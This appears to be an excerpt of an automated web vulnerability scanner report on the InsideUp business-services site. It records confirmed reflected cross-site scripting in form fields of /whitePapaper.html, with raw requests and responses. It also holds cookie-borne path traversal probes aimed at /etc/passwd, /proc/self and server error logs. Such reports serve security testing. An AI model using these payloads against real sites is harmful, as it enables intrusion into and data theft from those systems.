OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 229
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00045F)%3c%2fscript%3e&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:56 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=5B13041B61AC1A066DBD076214A79EFB; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="'"--></style></script><script>netsparker(0x00045F)</script>"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST '"--></style></script><script>alert(0x000472)</script>
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 225
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&iusrc=3&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000472)%3c%2fscript%3e&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:03 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DAEFBAB4A2D8F10743C2D4C4E69B6524; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="'"--></style></script><script>netsparker(0x000472)</script>"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>&am..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST '"--></style></script><script>alert(0x000499)</script>
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 